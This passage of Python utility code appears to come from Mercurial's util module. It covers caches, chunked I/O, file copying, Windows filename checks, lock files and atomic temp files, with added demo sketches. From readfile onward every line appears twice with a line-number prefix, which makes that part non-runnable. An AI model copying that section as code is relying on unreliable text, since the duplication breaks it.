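# Hedged illustration (not part of the original module): how the cost
# accounting above plays out. ``lrucachedict`` is the class defined above;
# the capacity and costs used here are arbitrary.
def _demolrucachedict():
    d = lrucachedict(4, maxcost=100)
    d.insert('a', 'va', cost=60)
    d.insert('b', 'vb', cost=60)
    # Inserting 'b' raised totalcost to 120 > maxcost, so eviction ran
    # down to the 75% target: the oldest entry 'a' was dropped.
    assert d.get('a') is None
    assert d.get('b') == 'vb'
    assert d.totalcost == 60
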
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

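# Hedged sketch (illustrative only): lrucachefunc() keeps roughly the 20
# most recent distinct arguments. ``square`` is a hypothetical callable.
def _demolrucachefunc():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    cached = lrucachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9   # second call is served from the cache
    assert len(calls) == 1  # the wrapped function ran only once
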
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

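# Hedged sketch: propertycache computes a value on first attribute access
# and stashes it in the instance __dict__, so later reads bypass the
# descriptor entirely. ``demoobj`` is a hypothetical class.
def _demopropertycache():
    class demoobj(object):
        computed = 0
        @propertycache
        def answer(self):
            demoobj.computed += 1
            return 42
    o = demoobj()
    assert o.answer == 42
    assert o.answer == 42         # instance attribute shadows the descriptor
    assert demoobj.computed == 1  # the function body ran exactly once
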
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

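# Hedged illustration: feeding fixed-size pieces through increasingchunks()
# shows the emitted chunks growing from min toward max; sizes are arbitrary.
def _demoincreasingchunks():
    pieces = ['x' * 512] * 12  # 6144 bytes arriving in small pieces
    sizes = [len(c) for c in increasingchunks(pieces, min=1024, max=4096)]
    # Every chunk but the last is at least the current minimum, and the
    # minimum doubles after each emitted chunk.
    assert sizes == [1024, 2048, 3072]
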
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

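# Hedged sketch: nogc() is used as a decorator around code that builds very
# large containers; the collector's prior state is restored afterwards.
def _demonogc():
    @nogc
    def buildbig():
        return [{} for _ in range(1000)]
    enabled = gc.isenabled()
    buildbig()
    assert gc.isenabled() == enabled  # GC state restored on exit
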
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

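# Hedged illustration with hypothetical paths, guarded to POSIX so the
# os.sep-joined expectation below is well defined.
def _demopathto():
    if pycompat.ossep != '/':
        return
    # Getting from /repo/a/b to /repo/a/c: up one level, then into c.
    assert pathto('/repo', '/repo/a/b', 'a/c') == '../c'
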
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

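# Hedged round-trip sketch: write lock info with makelock() and read it
# back with readlock(); the lock file name is scratch and removed again.
def _demomakelock():
    fd, name = pycompat.mkstemp(prefix='lockdemo-')
    os.close(fd)
    os.unlink(name)  # makelock() wants to create the path itself
    try:
        makelock('pid:12345', name)
        assert readlock(name) == 'pid:12345'
    finally:
        tryunlink(name)
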
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

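# Hedged usage sketch: the module-level ``re`` object above is used like
# the stdlib module; it transparently prefers re2 when it is importable.
def _demorecompile():
    pat = re.compile(br'ba[rz]')
    assert pat.match(b'baz')
    assert not pat.match(b'foo')
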
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    meant as a simple alternative to "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is the result of 'os.stat()' if the specified 'path'
    exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more within
        the same second (= S[n-1].ctime), so comparing timestamps alone
        is ambiguous.

        The basic idea for avoiding such ambiguity is to "advance mtime by
        1 second, if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes masked by such conflicting mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity if the process doesn't have
        appropriate privileges for 'path', and returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

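# Hedged sketch: how isambig()/avoidambig() are meant to be used around a
# rewrite of some file; 'path' is any file the caller just rewrote.
def _demofilestat(path):
    old = filestat.frompath(path)
    writefile(path, b'rewritten within the same second')
    new = filestat.frompath(path)
    if new.isambig(old):
        # push mtime one second past the old one so a later stat-based
        # comparison cannot mistake the rewrite for the original content
        new.avoidambig(path, old)
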
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode,
                                    enforcewritable=('w' in mode))

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

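# Hedged usage sketch: atomictempfile as a context manager; 'path' is any
# writable file path. The target only changes if the block doesn't raise.
def _demoatomictempfile(path):
    with atomictempfile(path) as fp:
        fp.write(b'all-or-nothing payload')
    # had the block raised, __exit__ would have called discard() and the
    # original contents of 'path' would be untouched
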
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

2312 def readfile(path):
2312 def readfile(path):
2313 with open(path, 'rb') as fp:
2313 with open(path, 'rb') as fp:
2314 return fp.read()
2314 return fp.read()
2315
2315
2316 def writefile(path, text):
2316 def writefile(path, text):
2317 with open(path, 'wb') as fp:
2317 with open(path, 'wb') as fp:
2318 fp.write(text)
2318 fp.write(text)
2319
2319
2320 def appendfile(path, text):
2320 def appendfile(path, text):
2321 with open(path, 'ab') as fp:
2321 with open(path, 'ab') as fp:
2322 fp.write(text)
2322 fp.write(text)
2323
2323
2324 class chunkbuffer(object):
2324 class chunkbuffer(object):
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 iterator over chunks of arbitrary size."""
2326 iterator over chunks of arbitrary size."""
2327
2327
2328 def __init__(self, in_iter):
2328 def __init__(self, in_iter):
2329 """in_iter is the iterator that's iterating over the input chunks."""
2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 def splitbig(chunks):
2330 def splitbig(chunks):
2331 for chunk in chunks:
2331 for chunk in chunks:
2332 if len(chunk) > 2**20:
2332 if len(chunk) > 2**20:
2333 pos = 0
2333 pos = 0
2334 while pos < len(chunk):
2334 while pos < len(chunk):
2335 end = pos + 2 ** 18
2335 end = pos + 2 ** 18
2336 yield chunk[pos:end]
2336 yield chunk[pos:end]
2337 pos = end
2337 pos = end
2338 else:
2338 else:
2339 yield chunk
2339 yield chunk
2340 self.iter = splitbig(in_iter)
2340 self.iter = splitbig(in_iter)
2341 self._queue = collections.deque()
2341 self._queue = collections.deque()
2342 self._chunkoffset = 0
2342 self._chunkoffset = 0
2343
2343
2344 def read(self, l=None):
2344 def read(self, l=None):
2345 """Read L bytes of data from the iterator of chunks of data.
2345 """Read L bytes of data from the iterator of chunks of data.
2346 Returns less than L bytes if the iterator runs dry.
2346 Returns less than L bytes if the iterator runs dry.
2347
2347
2348 If size parameter is omitted, read everything"""
2348 If size parameter is omitted, read everything"""
2349 if l is None:
2349 if l is None:
2350 return ''.join(self.iter)
2350 return ''.join(self.iter)
2351
2351
2352 left = l
2352 left = l
2353 buf = []
2353 buf = []
2354 queue = self._queue
2354 queue = self._queue
2355 while left > 0:
2355 while left > 0:
2356 # refill the queue
2356 # refill the queue
2357 if not queue:
2357 if not queue:
2358 target = 2**18
2358 target = 2**18
2359 for chunk in self.iter:
2359 for chunk in self.iter:
2360 queue.append(chunk)
2360 queue.append(chunk)
2361 target -= len(chunk)
2361 target -= len(chunk)
2362 if target <= 0:
2362 if target <= 0:
2363 break
2363 break
2364 if not queue:
2364 if not queue:
2365 break
2365 break
2366
2366
2367 # The easy way to do this would be to queue.popleft(), modify the
2367 # The easy way to do this would be to queue.popleft(), modify the
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 # where we read partial chunk content, this incurs 2 dequeue
2369 # where we read partial chunk content, this incurs 2 dequeue
2370 # mutations and creates a new str for the remaining chunk in the
2370 # mutations and creates a new str for the remaining chunk in the
2371 # queue. Our code below avoids this overhead.
2371 # queue. Our code below avoids this overhead.
2372
2372
2373 chunk = queue[0]
2373 chunk = queue[0]
2374 chunkl = len(chunk)
2374 chunkl = len(chunk)
2375 offset = self._chunkoffset
2375 offset = self._chunkoffset
2376
2376
2377 # Use full chunk.
2377 # Use full chunk.
2378 if offset == 0 and left >= chunkl:
2378 if offset == 0 and left >= chunkl:
2379 left -= chunkl
2379 left -= chunkl
2380 queue.popleft()
2380 queue.popleft()
2381 buf.append(chunk)
2381 buf.append(chunk)
2382 # self._chunkoffset remains at 0.
2382 # self._chunkoffset remains at 0.
2383 continue
2383 continue
2384
2384
2385 chunkremaining = chunkl - offset
2385 chunkremaining = chunkl - offset
2386
2386
2387 # Use all of unconsumed part of chunk.
2387 # Use all of unconsumed part of chunk.
2388 if left >= chunkremaining:
2388 if left >= chunkremaining:
2389 left -= chunkremaining
2389 left -= chunkremaining
2390 queue.popleft()
2390 queue.popleft()
2391 # offset == 0 is enabled by block above, so this won't merely
2391 # offset == 0 is enabled by block above, so this won't merely
2392 # copy via ``chunk[0:]``.
2392 # copy via ``chunk[0:]``.
2393 buf.append(chunk[offset:])
2393 buf.append(chunk[offset:])
2394 self._chunkoffset = 0
2394 self._chunkoffset = 0
2395
2395
2396 # Partial chunk needed.
2396 # Partial chunk needed.
2397 else:
2397 else:
2398 buf.append(chunk[offset:offset + left])
2398 buf.append(chunk[offset:offset + left])
2399 self._chunkoffset += left
2399 self._chunkoffset += left
2400 left -= chunkremaining
2400 left -= chunkremaining
2401
2401
2402 return ''.join(buf)
2402 return ''.join(buf)
2403
2403
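# Editorial sketch, not part of the original change (the sample chunks are
# hypothetical): reads of any size are satisfied across chunk boundaries.
#
#   buf = chunkbuffer(iter(['abcd', 'ef', 'ghij']))
#   buf.read(3)   # -> 'abc' (partial first chunk)
#   buf.read(5)   # -> 'defgh' (spans three chunks)
#   buf.read(2)   # -> 'ij'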
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data).  Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

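# Editorial sketch, not part of the original change (the file name is
# hypothetical): stream a file in bounded chunks instead of reading it whole.
#
#   with open('payload.bin', 'rb') as fp:
#       for chunk in filechunkiter(fp, size=65536, limit=2 ** 20):
#           pass   # each chunk is at most 64 KiB; at most 1 MiB in total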
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

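# Editorial sketch, not part of the original change (``fp`` is a
# hypothetical file object): cap a consumer at a 16-byte frame so it
# cannot read past it.
#
#   reader = cappedreader(fp, 16)
#   reader.read()      # returns at most 16 bytes
#   reader.read(1024)  # b'' once the 16-byte allowance is exhausted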
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
